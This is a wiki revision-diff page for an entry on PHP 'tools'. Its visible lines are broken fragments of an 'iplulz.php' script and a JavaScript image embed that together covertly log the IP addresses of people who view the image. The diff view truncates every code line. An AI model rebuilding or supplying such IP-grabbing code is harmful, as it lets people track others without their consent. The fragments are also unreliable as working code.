tools:php
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
tools:php [2024/06/03 03:46] – Humphrey Boa-Gart | tools:php [2024/08/06 05:48] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | {{wst> | + | {{wst> |
====== PHP ====== | ====== PHP ====== | ||
Line 400: | Line 400: | ||
Then in iplulz.php on your server (or whatever you call it), put this code: | Then in iplulz.php on your server (or whatever you call it), put this code: | ||
- | //PROTIP: Make a directory on your server called | + | //PROTIP: Make a directory on your server called |
<?PHP | <?PHP | ||
Line 421: | Line 421: | ||
$the_image = " | $the_image = " | ||
$ip_lister = fopen(" | $ip_lister = fopen(" | ||
- | fwrite($ip_lister, | + | fwrite($ip_lister, |
fclose($ip_lister); | fclose($ip_lister); | ||
if (!strncasecmp(substr($the_image, | if (!strncasecmp(substr($the_image, | ||
Line 433: | Line 433: | ||
< | < | ||
- | document.write("< | + | document.write("< |
') | ') | ||
</ | </ |
tools/php.1717386389.txt.gz · Last modified: 2024/08/06 05:52 (external edit)
Find this page online at: https://bestpoint.institute/tools/php
Find this page online at: https://bestpoint.institute/tools/php